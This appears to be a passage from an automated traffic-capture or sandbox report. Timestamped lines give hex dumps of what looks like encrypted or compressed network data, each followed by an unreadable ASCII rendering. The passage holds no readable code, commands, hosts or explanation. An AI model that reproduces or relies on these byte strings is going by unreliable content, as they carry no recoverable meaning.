23 69 ad 07 50 b2 ec 0d 81 88 93 31 88 a3 75 16 3c 88 09 70 d5 62 62 a7 d0 18 f4 6b 9b 42 16 7d 4e 1c 47
                                                        Data Ascii: PjVJ3!0g<:$|b. ni!=DwC0Go<b}6a<Ds9)hEMp"'OhWQf[|-T;lMd7)L;5w,o'#1TMEtl#IO0Hw2tg]@}OFJi|#iP1u<pbbkB}NG
                                                        2021-12-16 12:20:36 UTC45INData Raw: 03 d7 78 b0 9e 45 51 e7 7b 37 87 c1 68 f9 6d 79 cd 56 1c 77 7b d5 e3 1c 0a 2d 5f c9 21 aa ac 58 b4 f6 a1 6a 5e 3b 88 15 1d aa 26 5d 2b d6 e2 2d 3f bf f2 18 48 76 0b b3 15 68 54 eb e5 a7 31 da 39 56 5e 26 f3 3e 4e 45 5b cf b8 ff 8d 3a d5 af a0 5d 92 b7 d8 a8 f9 e5 48 c0 f5 7d 4d 27 1e d6 ff 65 54 57 cc f8 86 ba b7 af 85 5c c7 9d 4b 6e e6 6f 1c b9 b6 85 25 2c bf 73 0f 0c 86 fe cf 04 49 e0 25 52 ba a0 a5 e3 4d 19 17 76 de 9e 05 e0 54 06 92 33 53 09 01 ba 79 b9 f4 8a 20 98 ae ca 2f e3 fb 6e 4c f8 92 6e c0 42 65 3b 5c b0 10 b4 be 8f ea 4c 21 c9 e1 bd 7f e3 2f ec 98 99 b9 03 26 cd 39 81 a7 6c fd 46 62 60 63 e0 6c 44 b1 ef 6c e2 f3 3e b9 18 b1 cb d5 93 22 49 f5 ee 10 97 5d b1 94 c3 d1 0b 1f fd e9 ac cd 52 9d f1 33 4d a5 a9 95 11 b4 4d ec 14 a9 2e 7c 76 be 45 d9
                                                        Data Ascii: xEQ{7hmyVw{-_!Xj^;&]+-?HvhT19V^&>NE[:]H}M'eTW\Kno%,sI%RMvT3Sy /nLnBe;\L!/&9lFb`clDl>"I]R3MM.|vE
                                                        2021-12-16 12:20:36 UTC47INData Raw: 50 a2 a6 62 2b 0e 4a 35 f8 80 8d b2 3a 7e 1b fd 89 2a d6 09 ef a5 8d f8 b8 36 a8 75 ab fb 21 9f e5 41 70 c6 20 d8 51 73 8d 02 95 b9 bb 8c 3d a8 99 44 77 e2 45 11 d6 6c 91 78 2a 7d 14 46 d6 be f5 d0 fe bc 83 db 6f f8 b7 92 86 0a 02 ed 1f ce c8 65 b3 4b ef be 39 36 22 ca 70 ed 2b 30 13 33 30 94 72 36 cf 4f 28 61 3c d6 28 d0 92 fb 9a 4f b9 8f de 54 51 fc f1 4c a7 b9 aa 5d 02 08 69 e8 a8 2a 1d 50 ce a1 a6 f1 d9 0d 4d 62 ec ac e8 b7 3c b3 e9 92 06 eb 39 a3 33 5f a4 b1 2a 65 22 d7 b0 8f 2b 54 bd 88 d7 97 17 8b 85 47 0c 2a 27 f2 f0 c2 e2 77 0f 67 92 5e 68 61 8c 48 97 cc a7 56 84 c5 32 3b 1e 5c 03 ba 5c ce 48 be 63 1d ba 82 4f 5d 74 86 b5 63 5e d1 6f a1 34 19 74 85 30 5a 6c e6 18 f7 8c aa 31 8c 81 bf 01 3d 8e 21 33 d1 4a 0f 8c c9 1c 9b ea f5 84 10 50 41 fa 4b 27
                                                        Data Ascii: Pb+J5:~*6u!Ap Qs=DwElx*}FoeK96"p+030r6O(a<(OTQL]i*PMb<93_*e"+TG*'wg^haHV2;\\HcO]tc^o4t0Zl1=!3JPAK'
                                                        2021-12-16 12:20:36 UTC48INData Raw: f5 a1 3c 9f 43 48 f3 00 ac 96 c4 4a 71 6b 07 54 7e b5 7e 68 d9 b5 14 0a 2d 5f f2 b5 bc bd 5b d0 79 88 5b 58 2c 58 3f d8 b9 2a 65 d7 a5 6f 2c 2e b0 f0 12 be f7 2d 9b 24 07 de e0 f6 a6 1f 41 12 6e 58 30 d1 cd 68 47 51 d9 e9 2f a5 90 d6 be af 23 19 9e 4f ad d4 e1 21 60 e2 6c 4d 5b 90 c6 f6 72 4f a5 47 ed 95 b4 e0 a9 84 5c c1 9f 47 6e e7 69 7f 18 2e 86 23 39 d9 e8 08 1d 88 cc 18 8d 48 e6 30 49 a0 b9 b7 0c 44 11 70 81 4c 9e 03 f9 48 3f b5 1b c1 02 17 4e 55 91 c9 a4 19 0d 83 eb 0d 84 c5 7f 4c c1 09 7e cc 60 2a 0e 2f 94 7d 3e b9 9c e0 32 b5 d8 e8 d8 46 e6 07 5d 89 95 ae 1b 41 f8 3d a9 33 7c f1 5d 45 4c 54 e8 44 d0 a1 e3 4e 64 ca 2f b7 5b ad ba f7 97 24 5e ea 8c 1b 9b 4c bd 25 e4 f6 23 2e ec e4 b7 d4 30 91 cb 33 4b be 7a 84 08 d3 7c 38 07 a7 2e 79 4f 96 78 b2 77
                                                        Data Ascii: <CHJqkT~~h-_[y[X,X?*eo,.-$AnX0hGQ/#O!`lM[rOG\Gni.#9H0IDpLH?NUL~`*/}>2F]A=3|]ELTDNd/[$^L%#.03Kz|8.yOxw
                                                        2021-12-16 12:20:36 UTC49INData Raw: a4 ab 48 b0 29 48 35 8d 97 9b 9a f5 6c 1c df 10 58 29 f0 03 76 91 e7 87 6d bd 69 ad e8 36 e2 be 69 5e ce fc cf 4d 6f 49 1a 8b af a5 9a 44 91 d8 bb 82 0f 41 56 d7 6d 91 74 56 b2 13 6e 8b af ed fd cf 86 99 f3 a1 ff a6 9f fa cb 13 fe 7a 84 ee 67 b5 22 20 96 ae 3c 35 f1 27 98 66 e0 13 35 29 a8 0a 23 de 56 28 5d 3f d6 24 d0 9c fb 9a 4f ae b3 69 44 3e d9 9c 66 a3 d6 88 59 09 d0 6d d9 91 0e 72 75 c6 b2 a9 ed dd 0d 4d 62 f6 90 f8 0c 3f b9 31 fd 2b c3 38 b5 22 5b b5 a5 43 7f d0 2e ba 88 29 7c 74 88 cc ad 39 12 07 49 1e 32 87 e4 ee d3 91 d6 60 30 98 54 64 c3 b1 4d bd c8 8f 40 ae c5 34 11 4c a3 03 11 dd d7 44 be 65 72 7c 80 4f 8e ab 2b ec 49 67 d1 6f ab 38 33 4c 1c 32 28 a3 e5 10 89 a0 ab 31 93 99 a2 03 75 89 09 61 b8 4a 09 b5 cf 0e 16 c7 9a 42 11 43 4d 35 43 14 ac
                                                        Data Ascii: H)H5lX)vmi6i^MoIDAVmtVnzg" <5'f5)#V(]?$OiD>fYmruMb?1+8"[C.)|t9I2`0TdM@4LDer|O+Igo83L2(1uaJBCM5C
                                                        2021-12-16 12:20:36 UTC50INData Raw: 64 bf 27 db 05 29 63 a9 ca 9b 24 e1 ee dd 8b ee 27 3f ac 16 d4 3a 3b 93 a0 d5 fc a9 99 02 6e 38 1a ce e8 65 1e a4 33 2a c6 a3 f4 e0 ed 2d 5d 0e bd c5 47 a8 04 af c1 43 ac ab cb d7 d7 b2 f4 cc 56 26 f5 da 0a d6 03 3a da 84 e7 3b c0 a0 27 84 9f a4 ec 48 f7 f8 3e d2 9e 1c 55 0b e6 e3 e3 d0 6c 28 54 15 76 e0 5c 96 d0 29 b3 0a 4f 4f bb a3 c0 bf 5d 1a 0e c4 a0 ae 82 9c 75 14 6f 56 64 c9 eb c6 8b 17 56 8c fb 41 df 09 62 2c 89 85 8a dd f6 6d 1c df f4 27 f3 27 cb a8 9f ff 9d bb 93 75 ad e2 f3 8d ef 43 5f d8 20 de 42 78 99 09 98 9c aa 85 48 af 98 45 7d f0 77 39 0d 20 91 70 23 75 12 6f 9a 8c fc d6 75 96 81 db 05 fe a6 84 9a 62 02 ed 1f ab 92 f4 b3 4d e3 9a d0 a5 22 c0 6b f8 41 9c 3d 32 3a b8 33 20 cd 45 41 77 34 fe 9d bc b4 ff b2 d2 bf a7 72 7f cd fa 9e 6c b6 bd bd
                                                        Data Ascii: d')c$'?:;n8e3*-]GCV&:;'H>Ul(Tv\)OO]uoVdVAb,m''uC_ BxHE}w9 p#uoubM"kA=2:3 EAw4rl
                                                        2021-12-16 12:20:36 UTC51INData Raw: 14 86 68 65 c4 08 54 3e 5c cf 8e a2 6a c0 0f c2 0d 79 d4 74 f6 e6 ea 0f b5 da b6 b1 31 c6 8f 65 a3 2c 94 81 ad f5 3a c1 e8 df c3 89 13 d3 34 0a af f4 ff a8 58 c0 df 14 61 44 0e 2b ea 23 51 0a d8 18 2e 6d 82 2a f3 b3 85 c3 06 ed 66 90 32 11 af 4f 8b 25 b4 3a 3d 36 1d 39 fb b9 df 24 e0 f9 40 af 0f 76 b6 3c 2e 96 b5 a8 3c 7c 61 c1 b1 bf 75 48 26 b7 1b bd d7 a3 fe b4 be 9f ac d0 e4 03 4e 94 be 09 fe e2 bc 8f 4d 37 db 05 a4 86 ae 35 ea 6b 0d 82 88 09 58 40 e8 9d 8f 00 3e 58 a9 93 bc bd 5b d0 56 98 6a 58 26 8c 04 08 93 2d 4f d0 d6 e2 6c 1a b6 e3 16 60 e3 08 ea 13 07 de 89 e4 a1 19 f0 3b 56 58 26 db 10 4e 45 51 d9 f8 29 8d 3a d5 b8 a9 4c 9e 51 4e ab f9 37 26 4a f4 68 4b 34 18 dd f6 74 59 6c 64 fe 86 b8 d9 25 84 32 c1 8e 50 69 fc 7b 28 64 2f 86 25 2a c1 fc 12 f2
                                                        Data Ascii: heT>\jyt1e,:4XaD+#Q.m*f2O%:=69$@v<.<|auH&NM75kX@>X[VjX&-Ol`;VX&NEQ):LQN7&JhK4tYld%2Pi{(d/%*
                                                        2021-12-16 12:20:36 UTC53INData Raw: db 01 ca 01 0b cb 81 f2 91 35 ef 26 4f a1 e1 29 03 36 7f 89 3a 3b 99 70 ea fc c1 98 2a 7a 4b 1a c4 c0 89 1f a4 39 5f f9 a3 f4 fb 9c 12 5c 0c bc 3b 4c 90 04 db d3 f9 ac b0 e1 22 d7 b2 ef ea 55 26 a9 da 0a d6 5d 3a da 95 94 87 c0 a0 2d 96 98 da c7 57 f6 fc 16 d0 9c 1c 53 39 b6 e0 e2 cd 74 33 56 55 71 8f 9a e7 d0 23 7c 77 d0 67 8c a9 ca cb 6d 32 36 ce 88 73 5f 9c 75 7d 2b 6a 64 cd c9 fc 8e 11 5b 79 b4 43 df 0f 94 21 ae ad bb b2 30 67 0f d1 2c 22 fe 37 fc a8 95 28 99 92 ab 75 d3 d4 2d 8d e3 41 89 c7 20 d8 55 17 a2 09 84 b4 a6 83 3d 1b 99 44 77 fd 4e 2a 1f 7a 82 73 01 b7 12 6e 81 ad fb c7 9c 0e 92 de 17 c2 a6 95 e3 f0 da ee 15 a7 fd 62 9b 69 e9 96 a4 21 4d fd 61 eb 4e f1 15 1b 2d bd 1b 3d de 43 6f a3 3e d6 24 d0 01 f8 9a 43 cb b5 78 57 4a 95 85 67 a5 b3 bf 50
                                                        Data Ascii: 5&O)6:;p*zK9_\;L"U&]:-WS9t3VUq#|wgm26s_u}+jd[yC!0g,"7(u-A U=DwN*zsnbi!MaN-=Co>$CxWJgP
                                                        2021-12-16 12:20:36 UTC54INData Raw: 1d 40 48 ec d0 5f 51 7e ac a6 72 7a c5 2d 0d d9 78 d2 11 43 3f eb 05 93 f7 b0 61 3e 9e ab 93 ac 3b 44 87 b7 cc 71 d1 f8 e4 63 02 3c 54 fe 0a a9 eb ff b3 1d 1f a9 6d 55 dc 61 09 fb 29 46 11 f5 fe c4 6e 84 43 b4 2c 85 c5 1d cb 46 86 5b 24 a8 67 64 37 be 2d 2c 4f 13 7c fa bf c4 39 52 1e a9 ac 09 1f 89 28 06 d7 b2 b9 3c 05 e1 e8 b2 b4 64 40 61 ec 1b bd d7 f6 75 48 41 66 59 f5 e4 08 13 44 bd 09 f9 a1 2d 9e 43 48 cc 20 b5 81 d0 67 c2 80 04 5e 50 09 6b 40 98 9c 8f 00 3a cf f2 c3 bf bd 57 ce 68 88 2d 59 2c 58 10 94 d6 0c 67 d0 d0 f3 2b 06 5a e0 14 66 8c 22 b1 13 01 d8 fb e3 ce 03 4d 3a 5c 49 3a b4 d7 4e 45 5b e3 33 d7 72 c5 0b a8 b8 46 eb a4 4f ab f8 cf 2b 5b fe 08 70 34 18 c6 99 23 58 7f 5e 27 97 b4 cf f3 97 54 d0 86 50 76 61 c9 2f eb d1 79 da f4 c5 dc 26 3b 80
                                                        Data Ascii: @H_Q~rz-xC?a>;Dqc<TmUa)FnC,F[$gd7-,O|9R(<d@auHAfYD-CH g^Pk@:Wh-Y,Xg+Zf"M:\I:NE[3rFO+[p4#X^'TPva/y&;
                                                        2021-12-16 12:20:36 UTC55INData Raw: 97 c0 7f 92 c0 a9 c0 82 30 f8 eb 5f a7 da 3c 36 25 c0 c4 16 32 88 7a fd 66 a5 87 3e 69 2a 1a d5 d2 49 e1 a5 15 59 87 30 f4 e1 96 01 5b 12 af 29 4c ba 16 c4 f2 bd ad 9c ed c6 df ba 80 d4 57 26 af c5 28 c5 4f 3a cb 87 8b a7 3e a1 01 84 88 d7 d0 9f e4 f1 09 e2 8f 0e 53 32 a4 f9 1d d7 68 39 25 af 70 8f 90 9c ca 30 7f 04 7b 75 94 5d c1 99 48 1a 2a c7 a0 a2 74 bf 73 6a 4e 7f 9a ce c3 d7 a1 33 50 a4 a1 51 db 16 59 27 8b 94 9e ad 29 93 1d f9 23 11 6a 0f fc a8 80 ef 83 81 ab 64 bf f7 26 73 e8 45 55 d5 2e cf 4f e2 8c 0e 9b b2 b9 99 52 be 8a 5b 74 0e 46 15 16 7a 82 73 26 7f 01 7c 81 ad e7 c9 9e 6a 80 f7 60 c6 16 94 e9 d8 1d fd 06 b3 ec 76 a1 52 f8 68 af 1a 3f d1 6a fc c9 bd 13 33 3b af 14 26 c0 53 58 47 a0 c7 2d d0 f8 f8 9a 43 ac ad 67 45 42 e8 9e 77 b7 a3 52 5a 25
                                                        Data Ascii: 0_<6%2zf>i*IY0[)LW&(O:>S2h9%p0{u]H*tsjN3PQY')#jd&sEU.OR[tFzs&|j`vRh?j3;&SXG-CgEBwRZ%
                                                        2021-12-16 12:20:36 UTC56INData Raw: 07 4e ed d0 5f 29 db f1 a6 74 6a d3 10 fb cf 6e cb 73 43 2e fe 60 f3 d3 a1 6d 3c 90 95 65 a4 b5 f5 8a 7b f7 21 c3 e8 d6 ae 98 14 bc ec 01 be ee 73 b3 5d 1a a9 61 2c 47 0f 2d f3 38 4b 11 e0 4c 05 65 80 45 dd de 63 c4 17 ed 61 69 5f 6a 81 57 9c 3f af 3b a3 4f 2a 30 ea af 54 41 01 36 43 a5 11 c3 f3 cc 2e 90 b9 b5 27 18 6a d0 2b 9d 6d 42 49 76 74 bc dc 99 59 5b 4a 71 62 d1 23 97 13 a5 ba 09 f9 a1 b1 9f 43 48 bf 29 d1 96 ca 73 fa f1 11 4f 5d 0d 6d f2 b0 54 8f 0a 27 42 00 46 4e bd 51 d1 6d a5 7b 53 3d 42 11 d8 23 3c 74 db c7 f2 3a f8 2c 8c dd 60 e3 02 ab c9 68 2c ea e5 ab 0a 4a 49 74 5a 30 dd 03 5f 54 54 b6 31 29 8d 30 cf 8f 87 5d 8f 97 20 83 fb e3 21 5b e5 6c 4d 5b 3c c5 f6 72 49 6e 45 fe e9 9a da 25 82 4d d0 a6 4a 7b ef 78 7f bb 2d 86 23 2c c1 e8 61 16 81 d6
                                                        Data Ascii: N_)tjnsC.`m<e{!s]a,G-8KLeEcai_jW?;O*0TA6C.'j+mBIvtY[Jqb#CH)sO]mT'BFNQm{S=B#<t:,`h,JItZ0_TT1)0] ![lM[<rInE%MJ{x-#,a
                                                        2021-12-16 12:20:36 UTC58INData Raw: ca 01 01 c0 af ca 76 d8 e5 ed 57 a7 cb 2f 32 06 3a c5 13 3a 99 70 9c fc a9 89 59 c0 38 1a ce ca 7a a6 a6 39 55 d1 6b f4 e1 96 3a 44 0a bc 3d 64 12 06 db d5 6b 64 b0 e1 dd ff a8 eb fc 53 0e 8d da 0a dc 4b 12 30 94 94 8b e8 87 2d 8e 93 c9 c2 58 f2 d4 27 c5 9c 16 7e 28 c5 5a e3 d6 4e 3b 8b c8 70 8f 9a 87 d5 0b 31 04 6a 61 81 aa e8 57 52 32 30 ec 43 a7 5c 9a 5b 37 44 57 62 de c7 d8 a1 f2 53 a4 ad 6a 39 0c 4a 33 a3 d8 8c b2 36 7e 1a dc 02 ce d5 0f fa 80 77 f6 90 95 83 28 ad e8 2b 9e e1 60 76 df 24 de 44 50 83 0d 84 b8 82 d6 52 af 9e 57 7a f9 6f 24 15 6c 97 56 27 71 12 68 a9 e1 f5 d6 97 98 90 d3 41 d0 a4 95 ef ce 2a c3 15 a1 e6 71 9d 1e 9a b4 ac 36 24 d3 68 fa 4d f3 17 1b de bf 1b 31 de 43 6f 5d 3d d6 28 d0 9c fb 9a 4f ae ae 69 5f 3e de 9c 66 a3 a8 a5 4a 0e b9
                                                        Data Ascii: vW/2::pY8z9Uk:D=dkdSK0-X'~(ZN;p1jaWR20C\[7DWbSj9J36~w(+`v$DPRWzo$lV'qhA*q6$hM1Co]=(Oi_>fJ
                                                        2021-12-16 12:20:36 UTC59INData Raw: cd fd d8 42 26 da 91 a6 74 6a 62 14 e2 ce 6c c0 56 7d 3f eb 05 97 c3 a1 67 25 88 87 73 bb 13 ff 91 a1 e2 2e 5d ff ee 74 99 07 b4 ec 02 b9 e5 f8 9d 8c 92 96 67 43 47 ac 3c f1 3e 5c 11 f6 00 36 7c 82 93 01 3d ba c5 17 e6 d5 86 55 21 b9 5b a5 97 be 2b 33 71 2a 3b fb b5 dd 29 d9 32 6b 33 09 19 96 21 3e b8 5f b8 36 19 6a c6 6b a2 be 59 66 61 1c 95 41 99 53 40 5e 70 5a 2a f4 0d 31 79 a1 30 a2 14 a3 9b 4b 53 e5 2d 49 86 c1 68 66 34 07 5e 57 34 4b 69 df 97 83 1b 2b 42 0c 3a ba ac 57 ca 77 9e 54 a7 d3 ad 0e 26 25 2a 65 da dc 3c 3f 06 81 e3 14 6a cb 26 b1 13 01 d4 c2 dd a1 19 46 e4 56 5e 1a db 10 0f 59 51 d9 f8 29 8d 3a d5 be a9 4c e4 9e 4f ab 83 e2 27 4a e6 7d 4b 34 02 c7 f6 75 43 4f 53 fb 80 bd d8 25 fa 5c c1 9f 43 75 ed 68 7f 75 2e 86 2f 35 8f ca 06 0e 97 b9 7c
                                                        Data Ascii: B&tjblV}?g%s.]tgCG<>\6|=U![+3q*;)2k3!>_6jkYfaAS@^pZ*1y0KS-Ihf4^W4Ki+B:WwT&%*e<?j&FV^YQ):LO'J}K4uCOS%\Cuhu./5|
                                                        2021-12-16 12:20:36 UTC60INData Raw: 01 01 bc a8 ca 91 3a e5 f8 4d bd cb 2e 28 34 3e c5 3a 67 99 70 ea c1 a8 98 2a e3 39 1a c4 d6 52 1f a4 39 53 f9 a3 ef d1 98 12 1c 0f bc 3b cc ab 04 ca a0 f9 ac b0 eb dc ff 8d eb fc 53 2b 81 9a 0e d6 5b 30 d3 bd d5 85 c0 a6 05 a0 9b da c1 61 1f fd 16 cf b4 80 53 23 bc f3 e5 df 6c a6 55 15 76 a7 b4 94 d0 25 45 ec 6b 67 86 8b 5c b5 51 38 25 c0 a6 8c b3 9f 73 6c 6c 79 66 cd c5 f9 61 16 50 ae 83 de df 0f 40 26 8c 83 a4 24 33 6d 1a fd 04 2b d6 09 d4 40 9e f5 9a bb 37 75 ad e2 3e 88 f8 6f 76 ea 22 de 44 6e b7 27 84 be a0 9d ac ae 89 43 55 de 45 39 17 7a b9 50 39 75 18 78 7f bd aa fa 96 80 8d 06 ce fe a6 95 f8 de 2a c3 17 a1 ea 71 9b 63 e9 96 a4 20 0c 80 12 c9 46 e2 15 20 32 ad 13 1f 98 47 47 7c 52 fe 20 bf b2 e8 92 58 b9 c8 5c 55 51 fc 8f 6e b4 bd 84 59 08 d6 7a
                                                        Data Ascii: :M.(4>:gp*9R9S;S+[0aS#lUv%Ekg\Q8%sllyfaP@&$3m+@7u>ov"Dn'CUE9zP9ux*qc F 2GG|R X\UQnYz
                                                        2021-12-16 12:20:36 UTC61INData Raw: ec d0 5f 28 a8 ac b7 7f 04 09 05 ea d0 6e 2a 7c 81 13 ce 1e b4 fa 51 67 2f 9d 90 70 be 31 6a 62 a1 e4 30 db e9 e2 62 02 3c 6c ff 0a a9 d6 c7 99 5a 18 c6 1f 43 46 04 21 e8 2d 2f c9 f0 d6 27 7a 7a 47 dc de 4c c5 17 ed 60 69 5f 6a 81 7b fe 16 bc 2b 3f 4a 36 2a f6 b7 a1 06 ca 36 45 be 04 08 98 51 0a 92 b3 bf 27 1e 7c af 97 b7 64 40 58 7d 33 f5 d9 99 55 25 6b 62 72 c0 f3 1c 36 c0 a4 08 ff c4 6e 8b 66 6a d7 05 a4 8d d2 6c 99 d1 07 5e 5c 11 55 50 df 9d 85 d4 14 44 cb 3e 6a ae 40 ca 6f b1 78 d6 9b 6d de f0 46 d5 74 d6 c1 34 3e 28 a7 e5 05 70 dd 83 4d ec f8 00 ff c0 89 2e 4c 3a 5c 4b 3f a8 aa 4e 45 5b d4 d0 11 8d 3a df 60 ab 4a b4 96 65 ab f9 a2 13 4a f4 7d 4b 34 18 02 f6 74 58 a2 54 fb 86 1e d9 25 84 49 c1 8e 41 65 ef 7e 11 91 2f 86 25 78 d0 f9 0e 8b 81 d6 77 dd
                                                        Data Ascii: _(n*|Qg/p1jb0b<lZCF!-/'zzGL`i_j{+?J6*6EQ'|d@X}3U%kbr6nfjl^\UPD>j@oxmFt4>(pM.L:\K?NE[:`JeJ}K4tXT%IAe~/%xw
                                                        2021-12-16 12:20:36 UTC63INData Raw: 01 d1 81 80 90 35 ef fa 65 ce ca 2e 23 59 25 c4 3a 31 8a 74 fb f8 81 6f 2a 7a 3e 17 db 94 df 34 a4 39 52 ea a4 e5 e6 8a 32 ae 0e bc 3b d0 ba 03 cc cc 65 30 a1 e6 cf f7 33 ef fc 55 ba b8 dd 13 f6 99 3a da 95 08 90 c7 ba 32 b7 05 cb c0 52 d7 7a 16 c5 9c 80 42 24 aa c0 38 d6 44 30 ca 04 77 92 ba 04 d0 23 6d 98 7b 60 92 bc b1 29 40 35 29 cd 80 07 5c 9c 73 f6 55 50 7b c7 e3 68 89 17 50 38 ba 45 c0 04 6a d3 8b 85 8c 2e 21 6a 03 d9 35 7a 4a 1e fb b7 92 ea ea 0f ba 72 b2 e6 0d 18 e9 69 5e 58 31 d9 5d 77 80 75 18 af ad 94 42 b9 04 55 7a ef 56 2f 8d 7d 96 61 2b 63 8e 7f 86 a3 e6 c0 0d 85 86 c4 7d e8 3a 84 ee c7 17 fb 89 b0 eb 78 a5 6d 16 96 ae 36 be d1 66 f4 53 f4 8f 22 3d a3 03 21 53 54 40 65 24 f6 a2 bf b4 f9 06 58 b8 b8 62 41 cd eb 99 79 be af 30 4a 0e c9 60 db
                                                        Data Ascii: 5e.#Y%:1to*z>49R2;e03U:2RzB$8D0w#m{`)@5)\sUP{hP8Ej.!j5zJri^X1]wuBUzV/}a+c}:xm6fS"=!ST@e$XbAy0J`
                                                        2021-12-16 12:20:36 UTC64INData Raw: d0 5c 22 a8 af 8a 76 40 c5 3d 9d 25 87 2b 79 f4 3f eb 14 8f db a1 0b 2c 9b 83 fe af 3b 53 e1 1b e4 36 da f2 f4 f9 83 14 bc fc 19 b6 ef f0 8d 24 22 a9 67 49 6e 5b 29 f9 2f 2f b3 f1 d6 27 cf 95 5c cc cf b9 c5 17 ed 5f c1 59 35 ab 20 3e 35 be 21 9b 48 22 23 85 83 ce 2e c2 1e 14 ab 09 1f f3 8d 2f 90 b9 1b 27 0a 62 be 8d b5 64 4c 61 28 1f bd db f6 e0 4b 41 6a d0 d7 ec 01 33 bc af 1f ec de 88 40 41 42 e0 14 b5 96 d1 f8 e7 62 3e 92 54 1c 7d 61 b0 29 8e 0a 27 46 c9 3f af af 69 6a 7c a0 6a 49 3f 43 14 94 aa 2e 6c c1 d2 8d 9e 2f b6 e9 07 65 90 6c b2 13 0d cd ec f4 a4 31 15 3e 56 5e 5f 6e 11 4e 4f 45 27 f9 3f 73 3b c4 bb 81 16 9a 9f 49 c4 4c e2 27 40 e0 83 4a 22 e6 c6 e7 71 70 24 50 fb 80 d3 6d 24 84 56 d5 70 40 69 11 7f 70 80 2a ae 79 2e d0 ff 61 b9 81 d6 7d 10 b7
                                                        Data Ascii: \"v@=%+y?,;S6$"gIn[)//'\_Y5 >5!H"#./'bdLa(KAj3@ABb>T}a)'F?ij|jI?C.l/el1>V^_nNOE'?s;IL'@J"qp$Pm$Vp@ip*y.a}
                                                        2021-12-16 12:20:36 UTC65INData Raw: a7 ad ca 97 1d c1 f8 4d ad e3 01 29 36 34 e9 26 24 85 58 51 fc a9 92 45 5b 39 1a ce e8 35 1b a4 3f 7b dd a3 f4 eb b4 9f 5c 0e b6 37 45 25 b3 d3 5d f4 7a a7 ce dc a4 08 ef fc 5f 2d 74 b3 0c d6 5d 33 54 22 9c 0f 77 76 3a 54 8e 0c 4a 5c f7 fc 17 d6 98 15 dd 94 a0 d1 c8 c0 4d be e1 02 aa 9c 84 85 da 08 74 15 6e 76 86 aa d1 bf cb 1a 5e c0 a0 a2 74 b8 73 6a 4e f5 75 c7 d4 07 9a 1d 41 ae ba 5c ee ee 42 bb 3c 93 bd 85 26 7e 17 dc a4 9e c7 0b 72 1f 88 2f 83 8c b8 79 86 f7 3c 89 f8 65 56 d5 2b 44 6a 11 9b 09 82 96 8e 8b 52 a5 3a 55 76 e7 91 2a 1a 7d 9d 69 ef 66 1e 7f 8d ad ea e7 4a e7 73 da 69 f4 b5 9c f8 dc 11 cc 03 b2 cc 5f 01 48 e9 96 bf 17 33 e0 fb f8 51 f3 06 2a 2d a5 68 c4 ce 45 4d 69 2c c7 33 ab 9c 78 98 49 b9 b1 f5 50 51 fa 9f 72 b1 ad 84 f8 09 d6 76 e5 da
                                                        Data Ascii: M)64&$XQE[95?{\7E%]z_-t]3T"wv:TJ\Mtnv^tsjNuA\B<&~r/y<eV+DjR:Uv*}ifJsi_H3Q*-hEMi,3xIPQrv
                                                        2021-12-16 12:20:36 UTC66INData Raw: 50 65 a4 7f cc 6b a5 29 7a a2 57 90 bf 8f e6 0b e3 c9 e1 bd 46 09 06 5b 92 b1 68 11 2e d6 17 8d 35 6d f7 5f 40 32 7d c2 28 d2 b0 e9 09 d3 c8 2f bb 19 a6 a9 f8 b9 4f 4b e6 e5 6e 86 4d b7 f1 c7 d1 20 08 fd eb 95 a9 39 b9 f5 5c 57 b5 a4 8e 20 1f 6b ee 14 be 29 6e 57 56 55 ce 99 a2 94 5d 5c ca 23 86 e8 66 78 ee 94 93 1b a9 49 79 2c 67 ac cc 85 88 66 3c fd dd a4 47 b3 7d a0 b8 f2 79 6e 62 0d 9e 73 e7 a2 5a 40 b5 3a 3c 50 bc 93 64 01 01 ca 81 90 91 35 ef d0 a0 a6 cb 24 01 e1 3f c5 30 13 bd 70 ea f6 c6 b0 28 7a 3e 0b d3 d7 84 0c b3 28 5d ee 2e f3 e1 9c 13 4e 28 ad 1d 5a ba 13 57 ec 43 ac b1 43 c6 f1 a6 c7 52 55 26 a3 c5 2a 5a 62 3a da 94 82 a9 6b a0 2d 84 b5 f5 d6 47 e0 71 11 c5 9c 1d 40 00 a7 c3 f5 c7 53 bc 69 15 70 8e 38 87 f3 37 45 aa 6a 67 86 bc bf 39 6e 32
                                                        Data Ascii: Pek)zWF[h.5m_@2}(/OKnM 9\W k)nWVU]\#fxIy,gf<G}ynbsZ@:<Pd5$?0p(z>(].N(ZWCCRU&*Zb:k-Gq@Sip87Ejg9n2
                                                        2021-12-16 12:20:36 UTC67INData Raw: b6 98 dc 96 ce 82 57 f0 1b f0 6e 24 7d ec 91 cd 0e 74 9c 45 6a 09 a9 5f 03 d9 88 20 18 cc 23 02 48 48 0a 32 c3 c1 90 96 70 73 7c 88 64 63 a2 06 27 53 b1 c6 b5 bc ee bc 73 85 30 51 a1 ea 16 9f b1 a7 27 80 27 1f 2b 28 89 09 6b da 5c 18 a8 d8 90 2c e4 14 f5 38 45 4a 24 4f 16 b6 79 65 ea ad 25 3b 71 9f a5 64 9b d2 00 52 b4 e3 57 f9 cd f1 97 fe 39 3a be 2b 76 05 e3 db 56 43 54 6b a7 cf 94 ab e8 24 da ed 84 30 43 84 6b d1 8a fc 67 fd dd 42 e4 c2 cf 38 65 66 d7 d3 f9 d7 69 d9 6f cf 0e 09 1e ba 5c 16 70 f5 8c 55 f9 90 3b 42 93 b2 e2 20 c1 fd 60 c3 80 ce af ef 19 a1 d5 bb 8a 5f 0f a7 f3 52 42 1f 23 6d f3 56 2f e8 c7 2b 7c 8a 54 de a0 8b 51 37 18 77 97 5d e3 bc 4b 9c 3a 2a f1 a7 72 2b 2a fd ae c0 3f cd 27 4d 3b 18 1d 8d 30 ba 4a 2d bf 27 15 6a ce 25 9d 89 47 49 7a
                                                        Data Ascii: Wn$}tEj_ #HH2ps|dc'Ss0Q''+(k\,8EJ$Oye%;qdRW9:+vVCTk$0CkgB8efio\pU;B `_RB#mV/+|TQ7w]K:*r+*?'M;0J-'j%GIz
